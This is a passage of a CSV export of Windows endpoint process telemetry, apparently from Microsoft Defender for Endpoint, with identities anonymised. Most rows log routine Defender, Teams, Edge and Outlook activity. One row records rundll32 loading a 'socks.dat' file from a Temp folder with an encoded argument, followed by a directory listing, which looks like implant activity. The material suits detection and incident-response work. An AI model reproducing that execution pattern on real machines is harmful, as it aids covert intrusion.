[System.IO.FileAccess]::Read, [System.IO.FileAccess]::Read);$calculatedHash = Get-FileHash 'C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-075b1b75665454b124533865bb823596d0f0d475\FilePII_6eb1f04356edd651868478d7041a8b641a8b29a2.ps1' -Algorithm SHA256;if (!($calculatedHash.Hash -eq '9c478c54876bdf42dc4cfd9c96683cae55563e9fb457fad8b10c4c90a8d90567')) { exit 323;}; . 'C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-075b1b75665454b124533865bb823596d0f0d475\FilePII_6eb1f04356edd651868478d7041a8b641a8b29a2.ps1' }""",True,2021-06-24 01:25:22.168891200+00:00,11584,\Device\HarddiskVolume3\Program Files\Windows Defender Advanced Threat Protection\SenseIR.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 01:26:01.840243500+00:00,2021-06-24 01:27:35.637559400+00:00,f9dc5ef1-5091-469a-9b1d-896ac136784f,computerpii_0a470890c60768167990033d701e7bd881398861,172095,False,10.7740.19041.1052,False,11540474045175659,,11540474045175717,2021-06-24 01:25:52.287215900+00:00,6672,2021-06-24 01:25:52.287215900+00:00,\Device\HarddiskVolume3\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,6672,2176,ActiveProcessStartkey,C:\Windows\System32\WindowsPowerShell\v1.0,452608,2037-06-10 07:45:25+00:00,2020-10-09 20:48:24.470101200+00:00,2021-06-24 00:54:33.592091900+00:00,2020-10-09 20:48:24.470101200+00:00,128,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,256.0,,0.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,POWERSHELL,PowerShell.EXE,Windows PowerShell,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,auditpol,AUDITPOL.EXE,Audit Policy Program
+619,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-24 01:26:01.840847400+00:00,3668,auditpol.exe,"""auditpol.exe"" /get /subcategory:{0cce9232-69ae-11d9-bed3-505054503030} /r",PortableExecutable,2020-10-09 20:47:54.265073800+00:00,C:\Windows\System32\auditpol.exe,41984,0cbbb1ffe1af93272d498fb8fbbffcc6,d1c6ec7f394b59d067dfd47a6a65978e4c2cc73437457a4b78209e5f516471cc,e6a50645a361d5c763802ffa6e3c749fb81e96d7,04029e121a0cfa5991749937dd22a1d9,9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f,f43d9bb316e30ae1a3494ac5b0624f6bea1bf054,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-24 01:25:52.287215900+00:00,6672,powershell.exe,"powershell.exe -ExecutionPolicy AllSigned -NoProfile -NonInteractive -Command ""& {$OutputEncoding = [Console]::OutputEncoding =[System.Text.Encoding]::UTF8;$scriptFileStream = [System.IO.File]::Open('C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-075b1b75665454b124533865bb823596d0f0d475\FilePII_6eb1f04356edd651868478d7041a8b641a8b29a2.ps1', [System.IO.FileMode]::Open, [System.IO.FileAccess]::Read, [System.IO.FileAccess]::Read);$calculatedHash = Get-FileHash 'C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-075b1b75665454b124533865bb823596d0f0d475\FilePII_6eb1f04356edd651868478d7041a8b641a8b29a2.ps1' -Algorithm SHA256;if (!($calculatedHash.Hash -eq '9c478c54876bdf42dc4cfd9c96683cae55563e9fb457fad8b10c4c90a8d90567')) { exit 323;}; . 'C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-075b1b75665454b124533865bb823596d0f0d475\FilePII_6eb1f04356edd651868478d7041a8b641a8b29a2.ps1' }""",True,2021-06-24 01:25:22.168891200+00:00,11584,\Device\HarddiskVolume3\Program Files\Windows Defender Advanced Threat Protection\SenseIR.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 01:26:01.865439900+00:00,2021-06-24 01:27:35.637654100+00:00,0eec3ba2-beb4-4bb1-8a4e-d28e2377bd35,computerpii_0a470890c60768167990033d701e7bd881398861,172096,True,10.7740.19041.1052,False,11540474045175659,,11540474045175718,2021-06-24 01:25:52.287215900+00:00,6672,2021-06-24 01:25:52.287215900+00:00,\Device\HarddiskVolume3\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,6672,18560,ActiveProcessStartkey,C:\Windows\System32\WindowsPowerShell\v1.0,452608,2037-06-10 07:45:25+00:00,2020-10-09 20:48:24.470101200+00:00,2021-06-24 00:54:33.592091900+00:00,2020-10-09 20:48:24.470101200+00:00,128,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,256.0,,0.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,POWERSHELL,PowerShell.EXE,Windows PowerShell,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,auditpol,AUDITPOL.EXE,Audit Policy Program
+620,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-24 01:26:57.939890600+00:00,19884,SearchProtocolHost.exe,"""SearchProtocolHost.exe"" Global\UsGthrFltPipeMssGthrPipe_S-1-12-1-3476864874-1154527411-4288707492-1560701320745_ Global\UsGthrCtrlFltPipeMssGthrPipe_S-1-12-1-3476864874-1154527411-4288707492-1560701320745 1 -2147483646 ""Software\Microsoft\Windows Search"" ""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)"" ""C:\ProgramData\Microsoft\Search\Data\Temp\usgthrsvc"" ""DownLevelDaemon""  ""1""",PortableExecutable,2021-06-09 01:20:40.707822200+00:00,C:\Windows\System32\SearchProtocolHost.exe,419328,98ffd56887c1511e98a5542531829025,62d8455ee452be6aa6164426e43f2f1461858dd305a3e784dbd01e32691f30dc,e3228222bbeca59a928647c66c4162d1e33ae4a4,3effdb0c80e124422002c4c9ab44260b,e1bd5d2944c4ddfe7cbf6a5a14d8f06a35598a02a5ad824304f0b7936c410d7f,d3820e98b7a6f63507e21173ccdfe385bc956b65,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-12 08:58:16.041470900+00:00,4660,SearchIndexer.exe,SearchIndexer.exe /Embedding,True,2021-06-10 00:46:10.554990700+00:00,988,\Device\HarddiskVolume3\Windows\System32\services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 01:26:58.107300600+00:00,2021-06-24 01:27:35.642374500+00:00,f340fc67-96cf-40bc-aca3-2f18b0c1927e,computerpii_0a470890c60768167990033d701e7bd881398861,172147,False,10.7740.19041.1052,False,11540474045144190,,11540474045175739,2021-06-12 08:58:16.041470900+00:00,4660,2021-06-12 08:58:16.041470900+00:00,\Device\HarddiskVolume3\Windows\System32\SearchIndexer.exe,4660,128,ActiveProcessStartkey,C:\Windows\System32,935424,2033-01-12 07:23:33+00:00,2021-06-09 01:20:40.758122300+00:00,2021-06-12 08:58:09.260084800+00:00,2021-06-09 01:20:40.738030500+00:00,128,NoTruncation,0,,10.0,False,,,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,433423938,False,,128.0,,0.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Windows® Search,7.0.19041.1023,SearchIndexer.exe,SearchIndexer.exe,Microsoft Windows Search Indexer,Microsoft Corporation,Windows® Search,7.0.19041.1023,SearchProtocolHost.exe,SearchProtocolHost.exe,Microsoft Windows Search Protocol Host
+621,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-24 01:27:00.347082700+00:00,19896,SenseCncProxy.exe,4252,PortableExecutable,2021-05-12 01:12:26.930234800+00:00,C:\Program Files\Windows Defender Advanced Threat Protection\SenseCncProxy.exe,744776,affeaa20cf87ef4bbdc1529ab7fea66d,617bacf42b34dfb44986b4c855f07a7db54b27b6a5a78101bf4e53945d4e65b6,b19ae47bee16c9e6111db0ce54ee8ab52b32273d,7683949c195624008c868b6a7ab6a45c,8a31fd68d0629b6e486209353210c6e4f815ffb1b38e7ab58438ca0c9637f018,3eb02a132c439e2adf17ee32ddf6208727092c5a,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:11.888696800+00:00,4916,MsSense.exe,"""MsSense.exe""",True,2021-06-10 00:46:10.554990700+00:00,988,services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 01:27:01.107090400+00:00,2021-06-24 01:27:35.642564400+00:00,4081472d-bf64-46b4-b78e-b08344806c98,computerpii_0a470890c60768167990033d701e7bd881398861,172149,False,10.7740.19041.1052,False,11540474045137006,,11540474045175741,2021-06-10 00:46:11.888696800+00:00,4916,2021-06-10 00:46:11.888696800+00:00,\Device\HarddiskVolume3\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe,4916,18560,ActiveProcessStartkey,C:\Program Files\Windows Defender Advanced Threat Protection,5393304,2014-12-21 17:17:53+00:00,2021-06-09 01:20:34.243399200+00:00,2021-06-10 00:46:12.793828700+00:00,2021-06-09 01:20:34.069525500+00:00,256,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,,,0.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.7740.19041.1052,MsSense.exe,MsSense.exe,Windows Defender Advanced Threat Protection Service Executable,Microsoft Corporation,Microsoft® Windows® Operating System,10.7740.19041.964,SenseCncProxy.exe,SenseCncProxy.exe,Windows Defender Advanced Threat Protection Communications module
+622,True,System,S-1-5-20,NETWORK SERVICE,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-23 06:37:25.231348+00:00,3384,MpCmdRun.exe,"""MpCmdRun.exe"" GetDeviceTicket -AccessKey 8B1B0B9D-E61B-D134-CB6F-14BC76122AB9 ",PortableExecutable,2021-06-14 00:56:51.807361100+00:00,C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2105.5-0\MpCmdRun.exe,644888,86cf2e5256e9650cc1acca023d0e20c7,71cafc2ce5b1adcad16c53220a818e2db8545482506a683674f452741eb933ab,ad6d711d032d1ef2a7898f73a000f94a8bd39d0e,cecd78f3ee9d8d5cdb381f3c60ae8b1a,404d8d6ac0005cd7b57aa779ff7aca223c27cef4820c94de0a39c21604d4652b,f70eca243b0409cea2f8f642274cc13f23a22a25,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-14 00:56:58.859290200+00:00,2848,MsMpEng.exe,"""MsMpEng.exe""",True,2021-06-10 00:46:10.554990700+00:00,988,\Device\HarddiskVolume3\Windows\System32\services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 06:37:26.033211900+00:00,2021-06-23 06:39:33.324334800+00:00,9ceaf533-baba-4e6f-b8e3-ee2434789720,computerpii_0a470890c60768167990033d701e7bd881398861,164131,False,10.7740.19041.1052,False,11540474045145394,,11540474045173885,2021-06-14 00:56:58.859290200+00:00,2848,2021-06-14 00:56:58.859290200+00:00,\Device\HarddiskVolume3\ProgramData\Microsoft\Windows Defender\Platform\4.18.2105.5-0\MsMpEng.exe,2848,18560,ActiveProcessStartkey,C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2105.5-0,136656,1998-01-06 16:00:45+00:00,2021-06-14 00:56:50.126000+00:00,2021-06-14 00:56:58.853571700+00:00,2021-06-14 00:56:51.807361100+00:00,128,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,996,False,,128.0,,,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,4.18.2105.5,MsMpEng.exe,MsMpEng.exe,Antimalware Service Executable,Microsoft Corporation,Microsoft® Windows® Operating System,4.18.2105.5,MpCmdRun,MpCmdRun.exe,Microsoft Malware Protection Command Line Utility
+623,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-23 06:38:23.938403600+00:00,8920,Acrobat.exe,"""Acrobat.exe"" ""C:\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Windows\INetCache\Content.Outlook\UWEMRD7K\FilePII_601815f7e5ebd6a0f38c70e2bc2bdf16a1a913f5.pdf""",PortableExecutable,2021-05-28 05:58:58+00:00,C:\Program Files (x86)\Adobe\Acrobat DC\Acrobat\Acrobat.exe,3796704,ac7d72262c5389c8cbe58cdddd2083a3,9d84b01f481959d4c8c335af7c1473ba831b698387441a05713527f1dbb517d2,6daf3b0133be331cf2e41a8f4180f01653b91845,553bf7f8c0e762a4c89b34bc6a1e8472,40d1ffbfc08e1c8fdbf1424840b87dc7f6b64cd8ab495a498aaf8cb0df715dc9,222ef0a57b2bb0eab87583daa000f1c8bca664b9,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-23 00:51:43.564026600+00:00,16176,OUTLOOK.EXE,"""OUTLOOK.EXE"" ",False,2021-06-23 00:51:19.951048300+00:00,11452,\Device\HarddiskVolume3\Windows\explorer.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 06:38:23.954061200+00:00,2021-06-23 06:39:33.325690700+00:00,5f95d962-e0dc-4ad3-aa88-68177247e1d4,computerpii_0a470890c60768167990033d701e7bd881398861,164146,False,10.7740.19041.1052,False,11540474045171845,,11540474045173895,2021-06-23 00:51:43.564026600+00:00,16176,2021-06-23 00:51:43.564026600+00:00,\Device\HarddiskVolume3\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE,16176,128,ActiveProcessStartkey,C:\Program Files\Microsoft Office\root\Office16,41367344,2021-06-03 12:43:37+00:00,2021-06-12 08:57:23.589811200+00:00,2021-06-23 00:51:43.826220200+00:00,2021-06-12 08:57:23.540503500+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,388102317,388102317,False,1.0,3073.0,1.0,1025.0,,,,,,,Valid,OsVendor,Invalid,Unknown,Microsoft Corporation,Microsoft Outlook,16.0.13801.20738,Outlook,Outlook.exe,Microsoft Outlook,Adobe Systems Incorporated,Adobe Acrobat DC,21.5.20048.436468,,Acrobat.exe,Adobe Acrobat DC
+624,False,Low,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-24 01:24:35.715692100+00:00,5408,Teams.exe,"""Teams.exe"" --type=renderer --autoplay-policy=no-user-gesture-required --disable-background-timer-throttling --field-trial-handle=1784,798869040387949835,14039564101966597118,131072 --enable-features=WebComponentsV0Enabled --disable-features=PictureInPicture,SpareRendererForSitePerProcess --lang=en-US --enable-wer --ms-teams-less-cors=522133263 --app-user-model-id=com.squirrel.Teams.Teams --app-path=""C:\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Teams\current\resources\app.asar"" --electron-shared-settings=eyJ********** --device-scale-factor=1.25 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6124 /prefetch:1",PortableExecutable,2021-05-18 01:04:27.365665+00:00,C:\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Teams\current\Teams.exe,104860976,23f71890129a077d846a3fcd41bf9d55,b18426f62797d6101be8fef1c1f69ce4383f40360f04974cfa196b68fe74687e,dd08a0f120a870170a8170542985fda2087391b1,23f71890129a077d846a3fcd41bf9d55,b18426f62797d6101be8fef1c1f69ce4383f40360f04974cfa196b68fe74687e,dd08a0f120a870170a8170542985fda2087391b1,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-24 00:52:38.077847800+00:00,3760,Teams.exe,"""Teams.exe"" --system-initiated",False,2021-06-24 00:52:35.937594200+00:00,10608,\Device\HarddiskVolume3\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Teams\Update.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 01:24:35.775124900+00:00,2021-06-24 01:25:18.773375800+00:00,1ce285f1-3680-43ce-bd40-6fb033f7c208,computerpii_0a470890c60768167990033d701e7bd881398861,170903,False,10.7740.19041.1052,False,11540474045175219,,11540474045175617,2021-06-24 00:52:38.077847800+00:00,3760,2021-06-24 00:52:38.077847800+00:00,\Device\HarddiskVolume3\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Teams\current\Teams.exe,3760,128,ActiveProcessStartkey,C:\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Teams\current,104860976,2020-04-01 22:51:26+00:00,2021-05-18 01:04:31.750843800+00:00,2021-06-24 00:52:38.087365500+00:00,2021-05-18 01:04:27.365665+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,433423938,433423938,False,1.0,1.0,,384.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft Teams,1.4.00.11161,Teams,Teams.exe,Microsoft Teams,Microsoft Corporation,Microsoft Teams,1.4.00.11161,Teams,Teams.exe,Microsoft Teams
+625,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-24 01:24:59.499084500+00:00,10528,SenseCncProxy.exe,4288,PortableExecutable,2021-05-12 01:12:26.930234800+00:00,C:\Program Files\Windows Defender Advanced Threat Protection\SenseCncProxy.exe,744776,affeaa20cf87ef4bbdc1529ab7fea66d,617bacf42b34dfb44986b4c855f07a7db54b27b6a5a78101bf4e53945d4e65b6,b19ae47bee16c9e6111db0ce54ee8ab52b32273d,7683949c195624008c868b6a7ab6a45c,8a31fd68d0629b6e486209353210c6e4f815ffb1b38e7ab58438ca0c9637f018,3eb02a132c439e2adf17ee32ddf6208727092c5a,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:11.888696800+00:00,4916,MsSense.exe,"""MsSense.exe""",True,2021-06-10 00:46:10.554990700+00:00,988,services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 01:24:59.995661500+00:00,2021-06-24 01:25:18.773580100+00:00,436d5e6c-a0bb-4037-9cad-ce29464fe896,computerpii_0a470890c60768167990033d701e7bd881398861,170909,False,10.7740.19041.1052,False,11540474045137006,,11540474045175618,2021-06-10 00:46:11.888696800+00:00,4916,2021-06-10 00:46:11.888696800+00:00,\Device\HarddiskVolume3\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe,4916,18560,ActiveProcessStartkey,C:\Program Files\Windows Defender Advanced Threat Protection,5393304,2014-12-21 17:17:53+00:00,2021-06-09 01:20:34.243399200+00:00,2021-06-10 00:46:12.793828700+00:00,2021-06-09 01:20:34.069525500+00:00,256,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,,,0.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.7740.19041.1052,MsSense.exe,MsSense.exe,Windows Defender Advanced Threat Protection Service Executable,Microsoft Corporation,Microsoft® Windows® Operating System,10.7740.19041.964,SenseCncProxy.exe,SenseCncProxy.exe,Windows Defender Advanced Threat Protection Communications module
+626,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-25 02:39:38.291004800+00:00,11168,identity_helper.exe,"""identity_helper.exe"" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1968,16371743156790339825,14101909132760923270,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7556 /prefetch:8",PortableExecutable,2021-06-25 00:37:01.284115+00:00,C:\Program Files (x86)\Microsoft\Edge\Application\91.0.864.59\identity_helper.exe,1080736,b4521adad3d48999783119440df8f778,307456fb34b9c5b7621b70a9da9659dedde6eea45c570afd960e9427a5d6c9df,9885be7d4dfa860f6f598414641ff2af5baf5845,eaa5674047232d4a08e3f5a80ae41847,15a778c756ac6b0f18a1b8190e9091968b436ebe722213acbd9a1cadbdb985af,8ce6b1a36c89339834303a2877dbcea1b76a2e16,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-25 00:39:22.280625600+00:00,10392,msedge.exe,"""msedge.exe"" --profile-directory=Default",False,2021-06-25 00:39:00.068282600+00:00,15164,\Device\HarddiskVolume3\Windows\explorer.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-25 02:39:39.291679100+00:00,2021-06-25 02:39:57.837880300+00:00,abecd91b-776c-47e2-a405-feaea17d1b37,computerpii_0a470890c60768167990033d701e7bd881398861,185650,False,10.7740.19041.1052,False,11540474045178212,,11540474045179121,2021-06-25 00:39:22.280625600+00:00,10392,2021-06-25 00:39:22.280625600+00:00,\Device\HarddiskVolume3\Program Files (x86)\Microsoft\Edge\Application\msedge.exe,10392,18560,ActiveProcessStartkey,C:\Program Files (x86)\Microsoft\Edge\Application,3278240,2021-06-23 22:21:15+00:00,2021-06-24 06:58:35.468763900+00:00,2021-06-25 00:39:22.414877700+00:00,2021-05-21 00:32:35.112476600+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,469412852,469412852,False,1.0,3073.0,,,,,,,,,Valid,OsVendorApplication,Valid,OsVendorApplication,Microsoft Corporation,Microsoft Edge,91.0.864.59,msedge_exe,msedge.exe,Microsoft Edge,,Microsoft Edge,91.0.864.59,PWA Identity Proxy Host,identity_helper.exe,PWA Identity Proxy Host
+627,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-24 06:26:14.516091300+00:00,9008,cmd.exe,"""cmd.exe"" /c ""dir C:\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Office\""",PortableExecutable,2021-02-17 04:34:58.875918800+00:00,C:\Windows\System32\cmd.exe,289792,8a2122e8162dbef04694b9c3e0b6cdee,b99d61d874728edc0918ca0eb10eab93d381e7367e377406e65963366c874450,f1efb0fddc156e4c61c5f78a54700e4e7984d55d,ef3179d498793bf4234f708d3be28633,b53f3c0cd32d7f20849850768da6431e5f876b7bfa61db0aa0700b02873393fa,dd399ae46303343f9f0da189aee11c67bd868222,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-24 01:01:01.746618400+00:00,13732,rundll32.exe,"""rundll32.exe"" C:\Users\UserPII_645f5cd0404c4e1e192b246101c6588b1cef1c74\AppData\Local\Temp\socks.dat,#1 ekaneR12ATiPgB7C3Dr4+At9Lf4ljqq/fA/K4LYq42JQQo2BrDWbpw==",False,2021-06-24 00:59:43.689127700+00:00,9244,\Device\HarddiskVolume3\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 06:26:15.251083500+00:00,2021-06-24 06:28:12.012282300+00:00,119c7f36-0d34-4c2d-8052-adab1fb580a3,computerpii_0a470890c60768167990033d701e7bd881398861,176403,False,10.7740.19041.1052,False,11540474045175422,,11540474045176877,2021-06-24 01:01:01.746618400+00:00,13732,2021-06-24 01:01:01.746618400+00:00,\Device\HarddiskVolume3\Windows\System32\rundll32.exe,13732,18560,ActiveProcessStartkey,C:\Windows\System32,71680,2103-08-07 22:53:31+00:00,2021-02-17 04:35:14.392957300+00:00,2021-06-24 00:54:21.245734700+00:00,2021-02-17 04:35:14.391957+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,433423938,433423938,False,0.0,1.0,,,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.746,rundll,RUNDLL32.EXE,Windows host process (Rundll32),Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.746,cmd,Cmd.Exe,Windows Command Processor
+628,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-24 02:26:00.427070+00:00,6652,identity_helper.exe,"""identity_helper.exe"" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2084,2987170515631334499,3695594818534080064,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4016 /prefetch:8",PortableExecutable,2021-06-18 23:49:38.664048500+00:00,C:\Program Files (x86)\Microsoft\Edge\Application\91.0.864.54\identity_helper.exe,1080720,33098278b86f6e967f5e0f66da8192fa,dbe0ea072c1e26f07ae34f6b721074635048644ef14fce622e4097f05b6684c2,c345ea4721c3bafc8f7592f97f0407541b464904,e28229223228fde1f3bb465926566414,a1cb5c84d7387fa4da415c9af0db5f5534575f045f71b7afee0922fc0352d73f,c0c6f4240a04db99aae6f7c5312b7308c44945b1,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-24 00:52:20.669190100+00:00,15088,msedge.exe,"""msedge.exe"" --profile-directory=Default",False,2021-06-24 